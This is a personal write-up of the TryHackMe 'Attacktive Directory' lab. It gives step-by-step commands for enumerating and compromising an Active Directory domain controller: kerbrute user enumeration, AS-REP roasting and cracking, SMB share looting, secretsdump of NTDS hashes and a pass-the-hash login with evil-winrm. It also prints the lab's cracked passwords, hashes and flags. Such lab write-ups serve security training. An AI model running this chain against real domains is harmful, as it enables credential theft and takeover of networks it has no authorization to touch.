top of page

Attacktive Directory TryHackMe Lab HACKING ACTIVE DIRECTORY

Exploiting Vulnerable Domain Controller.

Attacktive Directory TryHackMe Lab HACKING ACTIVE DIRECTORY.png

Steps

1.Connect VM

Connect vm sudo openvpn lglen001.ovpn

3.

In the enumeration tab we wll run  a basic nmap scan NMAP [target IP]

4. 

I can assume it is running active directory by seeing Kerberos, net bios and ldap are running on port 389 ldap, 88 kerberos, 139 netbios.

5.

If we want to see the service on the machine we will run nmap [target ip] -sv

6.

After this we get the third answer being .local (TLD is top level domain)

7.

Going back to the first question we can use enum4linux we  can also use msf console even though the answer is enum 4 linux

8.

I Can see from the output that  we get THM-AD as the domain

9. 

Msfconsole attempt

10.

 msfconsole

11.

Use auxilary/scanner/smb/smb_version

12.

Show options

13.

Set RHOSTS [target ip]

14.

Run

15.

We will then see the domain name

What tool will allow us to enumerate port 139/445? enum4linux

 

What is the NetBIOS-Domain Name of the machine? THM-AD

 

What invalid TLD do people commonly use for their Active Directory Domain? .local

Enumerating users via kerbros

1. 

Now enumerate users

2.

Follow the steps to download kerbrute https://github.com/ropnop/kerbrute/releases

3.

After a lot of failure I realized that none of the packages will run in my vm because my host machien is ARM64 not amd64 I suggest using a different tool if needed. But for this lab this tool is necessary. I used linwinpwn  with the rid brute force option.

4.

Follow steps in another environment or their attack box

5.

Cd kerbrute directory

6.

./kerbrute_linux_amd64 userenum -d spookysec.local  --dc [target machine domain controller] users.txt

7.

Answer the try hack me  questions. What command within Kerbrute will allow us to enumerate valid usernames? Userenum

What notable account is discovered? (These should jump out at you) svc-admin

What is the other notable account is discovered? (These should jump out at you) backup

Exploiting active directory

1.I will use impacket for this section and use GetNPUsers.py

The tool is in /opt/impacket/examples/ so cd /opt/impacket/examples/

2.

Python3 GetNPUsers.py to get help option

3.

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.115.28  we run this command using our domain name /svc-sdmin user no password and use the domain controlllers IP

4.

This command is what we need to produce the TGT output for SVC-ADMIN which is the hash value

5.

Now hash crack start by cd /desktop directory makes sure we nano hash.txt  and place our hash in that file. We will use john to crack the hash.

6.

john hash.txt --wordlist=passwords.txt

7.

Our password that we recived for svc-admin is management2005

8.

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?svc-admin

 

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) Kerberos 5 AS-REP etype 23

 

What mode is the hash? 18200

 

Now crack the hash with the modified password list provided, what is the user accounts password?management2005

Enumeration shares

1. 

We can use smbclient for smb enumeration we will run this command

2.

sudo smbclient -U spookysec.local/svc-admin -L //10.10.115.28

3.

We will enter the password we recived for svc -admin management2005

4.

Then we will receive all shares in the environment

5.

In those 6 shares we see want to see what is in smb share backup use command the only one we can get into

6.

We will get smb directory prompt

7.

Use command pwd to see current directory

8.

Ls command

9.

Then get backup_credentials.txt

10.

Nano backup_credintials.txt

11.

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw is the output txt in the file is in base64

12.

Go online and use a base64 decoder

13.

Decode output : backup@spookysec.local:backup2517860

14.

What utility can we use to map remote SMB shares? smbclient

 

 

Which option will list shares? -L

 

 Hint

How many remote shares is the server listing? 6

 

There is one particular share that we have access to that contains a text file. Which share is it? backup

 

What is the content of the file? YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

 

 

Decoding the contents of the file, what is the full contents? backup@spookysec.local:backup2517860

Elevating privileges in domain

Since I have gained more privileges with my backup user account, I now possess greater authority compared to before. As the backup account for the Domain Controller, I enjoy elevated privileges beyond regular users. A unique permission is assigned to this account, enabling synchronization of all Active Directory modifications with my user account, including password hashes.

Given this valuable information, I can leverage a tool called "secretsdump.py" within Impacket. This powerful tool allows me to extract all the password hashes associated with the user account that remains in sync with the domain controller. By exploiting this capability, I will effectively gain complete control over the AD Domain.

1. 

The tool is in /opt/impacket/examples/ so cd /opt/impacket/examples/

2.

Sudo Secretsdump.py

3.

Sudo Secretsdump.py -dc-ip 10.10.171.96 spookysec.local/backup:backup2517860@10.10.171.96

4.

This command gets us the Hash to all of the accounts on this active directory.We are interested the NTLM Hash and it is the third string 0e0363213e37b94221497260b0bcb4fc

5.

We go to a fresh terminal and cd /opt/impacket/examples/

6.

We will then use a tool that allows us to gain access through which is evil-winrm

7.

The command : sudo evil-winrm -i 10.10.171.96 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

8.

If it works I'll get administrator access to administrator directory.

9.

From that point we can complete the Attacktive Directory tryhackme lab

10.

What method allowed us to dump NTDS.DIT? DRSUAPI

What is the Administrators NTLM hash? 0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?Pass The Hash

Using a tool called Evil-WinRM what option will allow us to use a hash? -H

11.

svc-admin :TryHackMe{K3rb3r0s_Pr3_4uth}

Backup :TryHackMe{B4ckM3UpSc0tty!}

 

 

 

 

Administrator :TryHackMe{4ctiveD

1rectoryM4st3r}

Lessons Learned

During the Attacktive Directory TryHackMe engagement, several important lessons were learned. 

Firstly, it is crucial to establish a secure connection to the virtual machine by following the provided instructions, such as using the appropriate OpenVPN configuration file. 

Secondly, meticulously following the step-by-step guidelines and instructions provided in the lab or resource is paramount for success. Enumeration plays a vital role in penetration testing, and tools like Nmap should be used to identify the services running on the target machine. Paying attention to port numbers and associated services, such as Kerberos, LDAP, and NetBIOS running on ports 389, 88, and 139 respectively, can indicate the presence of Active Directory. 

Enumeration tools like enum4linux and Metasploit's Msfconsole are helpful for gathering information and performing reconnaissance. Understanding the target system's architecture is important, as some tools may not be compatible, and verifying compatibility between ARM64 and amd64 is crucial. 

Exploiting Active Directory often involves extracting user account information, such as usernames and password hashes. Impacket, a powerful Python library, provides various tools for interacting with Active Directory, including GetNPUsers.py for retrieving password hashes and secretsdump.py for dumping NTDS.DIT. Hash cracking tools like John the Ripper can be employed to recover plaintext passwords from the hashes. 

Smbclient proves valuable for SMB enumeration, listing shares, and accessing files within those shares. It is essential to decode any encoded content, such as base64-encoded files, using available online decoding tools. 

Privilege escalation is possible by leveraging higher privileged user accounts, such as the backup account, which may provide access to additional resources and sensitive information. Tools like secretsdump.py from Impacket can be used to retrieve password hashes synced with the domain controller. 

Evil-WinRM, a remote Windows command execution tool, can exploit the obtained password hashes to gain unauthorized access to the target machine. Proper documentation of discovered credentials and associated user accounts is essential for progress throughout the engagement. 

These lessons provide valuable insights for conducting penetration testing and highlight the importance of following ethical guidelines and obtaining legal authorization for security testing activities.

bottom of page